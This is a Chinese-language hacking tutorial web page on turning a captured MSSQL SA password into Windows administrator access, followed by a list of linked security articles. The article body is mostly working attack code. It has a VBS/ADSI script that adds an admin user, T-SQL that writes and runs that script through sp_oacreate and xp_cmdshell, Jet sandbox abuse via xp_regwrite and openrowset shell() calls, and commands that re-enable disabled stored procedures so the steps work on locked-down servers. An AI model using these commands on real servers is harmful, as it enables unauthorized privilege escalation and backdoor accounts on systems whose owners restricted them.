mssql SA权限最新利用方法
所属分类:
网络安全 / 黑客教程
阅读数:
170
收藏 0赞 0分享
在获得SA密码后,往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用,无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象,用来管理本地资源,利用它可以不依靠CMD等命令就能添加一个管理员,具体代码如下:以下是引用片段: set wsnetwork=CreateObject("WS C R I P T.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) ’得到adsi接口,绑定 Set oe=GetObject(os&"/Administrators,group") ’属性,admin组 Set od=ob.Create("user","test") ’建立用户 od.SetPassword "1234" ’设置密码 od.SetInfo ’保存 Set of=GetObject(os&"/test",user) ’得到用户 oe.add os&"/test" 将上面的代码保存为1.vbs,然后执行,命令为“cscript 1.vbs”,这样就会在系统添加一个系统名为test,密码为1234的用户。具体在查询分析器执行的代码如下:以下是引用片段: declare @o int, @f int, @t int, @ret int exec sp_oacreate ’scripting.filesystemobject’, @o out exec sp_oamethod @o, ’createtextfile’, @f out, ’c:\1.vbs’, 1 exec @ret = sp_oamethod @f, ’writeline’, NULL,’set wsnetwork=CreateObject ("WS C R I P T.NETWORK")’ exec @ret = sp_oamethod @f, ’writeline’, NULL,’os="WinNT://"&wsnetwork. ComputerName’ exec @ret = sp_oamethod @f, ’writeline’, NULL,’Set ob=GetObject(os)’ exec @ret = sp_oamethod @f, ’writeline’, NULL,’Set oe=GetObject (os&"/Administrators,group")’ exec @ret = sp_oamethod @f, ’writeline’, NULL,’Set od=ob.Create ("user","test")’ exec @ret = sp_oamethod @f, ’writeline’, NULL,’od.SetPassword "1234"’ exec @ret = sp_oamethod @f, ’writeline’, NULL,’od.SetInfo ’ exec @ret = sp_oamethod @f, ’writeline’, NULL,’Set of=GetObject (os&"/test",user) ’ exec @ret = sp_oamethod @f, ’writeline’, NULL,’oe.add os&"/test"’ 执行完上面的语句,再执行下面这行代码,这行代码一定单独执行,不要与上面的放在一起执行,否则会提示“c:\1.vbs正被另一个程序运行”而无法成功添加用户: exec master..xp_cmdshell 'cscript c:\1.vbs' 如果系统用户没有添加成功,有可能是因为系统用户的密码1234的太简单,不符合服务器的复杂密码策略,可以考虑设置的复杂些,然后再测试一下。也可以使用echo将代码写到1.vbs中,代码格式为: exec master..xp_cmdshell 'echo set wsnetwork=CreateObject("WS C R I P T.NETWORK") >>1.vbs' 不过,不知道为什么所有带“&”字符的命令行都无法写入1.vbs,感兴趣的朋友可以尝试解决一下。使用jet沙盘模式,可以解决XP_cmdshell等存储过程和相关动态链接库带来的烦恼。出于安全原因,系统默认情况下沙盘模式未开启,这就需要xp_regwrite开启沙盘模式: Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0 \Engines','SandBoxMode','REG_DWORD',1 然后执行沙盘命令,在系统添加一个用户名为test,密码为1234的用户: select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows \system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")') select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows \system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators test /add")') 不同的操作系统,路径也不一样,需要根据情况做修改: NT/2K: c:\winnt\system32\ XP/2003: c:\windows\system32\ 另外Microsoft SQL Server2005在默认情况下,一些存储过程是关闭着的,需要命令打开:开启XP_cmdshell: EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 开启'OPENROWSET': exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE; 开启'sp_oacreate': exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
ARP欺骗攻击原理另一种理解方法
本文子明特别用通俗的例子,说明ARP欺骗攻击的原理,使ARP欺骗攻击原理更加清楚的展现在你的面前。
收藏 0赞 0分享
七招教你抵御ARP欺骗攻击
本文介绍了七种简易方法助你抵御ARP欺骗攻击,感兴趣的小伙伴们可以参考一下
收藏 0赞 0分享
全面剖析DDoS攻击 黑客常用攻击方式
纵观网络安全攻击的各种方式方法,其中DDoS类的攻击会给你的网络系统造成更大的危害。因此,了解DDoS,了解它的工作原理及防范措施,是一个计算机网络安全技术人员应必修的内容之一。
收藏 0赞 0分享
最简单的防止ARP欺骗的方法
局域网中的计算机容易遭受攻击的原因是使用动态的arp获取协议所以很不安全,当把arp协议设为静态的可以杜绝arp攻击的发生,需要了解的朋友可以参考一下
收藏 0赞 0分享
路由器防止ARP欺骗的设置步骤
ARP欺骗是一个比较常见的网络问题,它会盗取用户账号,还会导致网络的瘫痪。为此,很多路由器开发商都设置了路由器防止ARP欺骗的功能。下面小编说说路由器防止ARP欺骗的设置方法。
收藏 0赞 0分享
如何从运营角度保障DNS安全
如何从不同层面综合运营,保证DNS服务安全高效的运行?DNSPod工程师认为,主要应该从状态监控、信息告警、事件处理、数据记录、综合运营数据分析这五个方面入手。
收藏 0赞 0分享
DNS欺骗的原理 DNS防御实战演练
DNS即Domain Name System的缩写,域名系统以分布式数据库的形式将域名和IP地址相互映射。DNS协议即域名解析协议,简单的说:DNS是用来解析域名的。
收藏 0赞 0分享
对付DDoS攻击的三大绝招
不知道身为网络管理员的你是否遇到过服务器因为拒绝服务攻击都瘫痪的情况呢?就网络安全而言目前最让人担心和害怕的入侵攻击就要算是拒绝服务攻击了。和传统的攻击不同,采取的是仿真多个客户端来连接服务器,造成服务器无法完成如此多的客户端连接,从而无法提供服务。
收藏 0赞 0分享
查看更多